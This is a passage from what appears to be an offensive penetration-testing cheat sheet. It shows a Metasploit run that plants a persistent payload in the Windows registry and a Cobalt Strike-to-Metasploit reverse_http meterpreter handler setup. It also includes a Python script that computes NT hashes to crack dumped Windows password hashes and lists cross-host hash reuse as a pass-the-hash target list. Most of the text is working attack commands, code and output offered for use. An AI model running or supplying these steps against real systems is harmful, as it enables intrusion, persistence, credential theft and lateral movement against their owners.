   ----           ---------------  --------  -----------
   BLOB_REG_KEY                    no        The registry key to use for storing the payload blob. (Default: random)
   BLOB_REG_NAME                   no        The name to use for storing the payload blob. (Default: random)
   CREATE_RC      true             no        Create a resource file for cleanup
   RUN_NAME                        no        The name to use for the 'Run' key. (Default: random)
   SESSION                         yes       The session to run this module on.
   SLEEP_TIME     0                no        Amount of time to sleep (in seconds) before executing payload. (Default: 0)
   STARTUP        USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/registry_persistence) > set SESSION 13
SESSION => 13
msf5 exploit(windows/local/registry_persistence) > run

[*] Generating payload blob..
[+] Generated payload, 6048 bytes
[*] Root path is HKCU
[*] Installing payload blob..
[+] Created registry key HKCU\Software\0BaG3zDR
[+] Installed payload blob to HKCU\Software\0BaG3zDR\iiEB4InD
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SMPqA5kB
[*] Clean up Meterpreter RC file: /home/ubuntu/.msf4/logs/persistence/192.168.81.154_20190612.2138/192.168.81.154_20190612.2138.rc
```

Other modules of the same kind: exploit/windows/local/vss_persistence and exploit/windows/local/s4u_persistence.



# Cobalt Strike cheat sheet

Spawning an msf session from CS

```bash
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
msf exploit(handler) > set lhost 192.168.0.143
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
```

In CS create a Listener of type windows/foreign/reverse_http pointing at the msf host and port above, then select the target beacon, right-click -> Spawn and choose that listener. The foreign listener type must match the payload set in msf (reverse_http here; a reverse_https payload needs the foreign HTTPS listener).
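Back to the hashes dumped in the credential section above: as an added example (not part of the original cheat sheet or of Metasploit), a Python script that triages pwdump-format lines from `hashdump` / `smart_hashdump`. It flags accounts with a blank NT hash, accounts that still have an LM hash stored, NT hashes shared by accounts on different hosts (the password reuse that section warns about, and exactly what pass-the-hash exploits), and checks a short candidate list by computing NT hashes (MD4 of the UTF-16LE password) with a small built-in MD4, so it does not depend on OpenSSL's legacy provider. The SAUCERMAN lines are the ones dumped above; the FILESRV01 host, its hashes and the candidate list are constructed for the example.

```python
"""Triage pwdump-format hashes from hashdump / smart_hashdump.

Added example for this cheat sheet, not Metasploit code. The NT hash is
MD4(UTF-16LE(password)); a compact MD4 is included so the script also runs
where OpenSSL no longer exposes MD4.
"""
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4("") = NT hash of a blank password


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_round(state, X, fn, const, order, shifts):
    """One 16-step MD4 round; rotating the registers makes each step update the next one."""
    a, b, c, d = state
    for i, k in enumerate(order):
        a = _rotl((a + fn(b, c, d) + X[k] + const) & MASK, shifts[i % 4])
        a, b, c, d = d, a, b, c
    return [a, b, c, d]


def md4(data: bytes) -> bytes:
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)           # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        s = _md4_round(h, X, F, 0x00000000, range(16), (3, 7, 11, 19))
        s = _md4_round(s, X, G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13))
        s = _md4_round(s, X, H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15))
        h = [(x + y) & MASK for x, y in zip(h, s)]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(lines):
    """user:rid:lmhash:nthash::: ; smart_hashdump prefixes each line with '[+] '."""
    records = []
    for line in lines:
        line = line.strip()
        if line.startswith("[+] "):
            line = line[4:]
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        records.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return records


def triage(dumps, candidates):
    """dumps: {host: [pwdump lines]}; candidates: passwords to test against the NT hashes."""
    results, by_nt = [], {}
    for host, lines in dumps.items():
        for rec in parse_pwdump(lines):
            rec["host"] = host
            results.append(rec)
            by_nt.setdefault(rec["nt"], []).append(host + "\\" + rec["user"])
    known = {nt_hash(p): p for p in candidates}
    for rec in results:
        me = rec["host"] + "\\" + rec["user"]
        rec["blank_password"] = rec["nt"] == EMPTY_NT
        rec["lm_stored"] = rec["lm"] != EMPTY_LM        # a stored LM hash cracks in minutes
        rec["cracked"] = known.get(rec["nt"])
        # same NT hash on another host/account: reuse, usable directly with pass-the-hash
        rec["shared_with"] = [] if rec["blank_password"] else [a for a in by_nt[rec["nt"]] if a != me]
    return results


# Constructed sample: SAUCERMAN is the dump shown on this page; FILESRV01 is made up for the example.
SAMPLE_DUMPS = {
    "SAUCERMAN": [
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
        "TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::",
    ],
    "FILESRV01": [
        "[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::",
        "[+] svc_backup:1001:e52cac67419a9a224a3b108f3fa6cb6d:0123456789abcdef0123456789abcdef:::",
    ],
}
CANDIDATES = ["123456", "Password1", "admin"]

if __name__ == "__main__":
    for r in triage(SAMPLE_DUMPS, CANDIDATES):
        flags = [f for f in ("blank_password", "lm_stored") if r[f]]
        if r["cracked"]:
            flags.append("password=" + r["cracked"])
        if r["shared_with"]:
            flags.append("same hash as " + ", ".join(r["shared_with"]))
        print(f"{r['host']}\\{r['user']:<14} rid={r['rid']:<5} {', '.join(flags) or 'nothing notable'}")
```

On the sample it reports TideSec's hash as `123456` and as identical to the constructed FILESRV01 Administrator, which is the cross-host reuse to go after first. Feed it the loot file that smart_hashdump writes, one host per entry, and the `shared_with` column becomes your pass-the-hash target list.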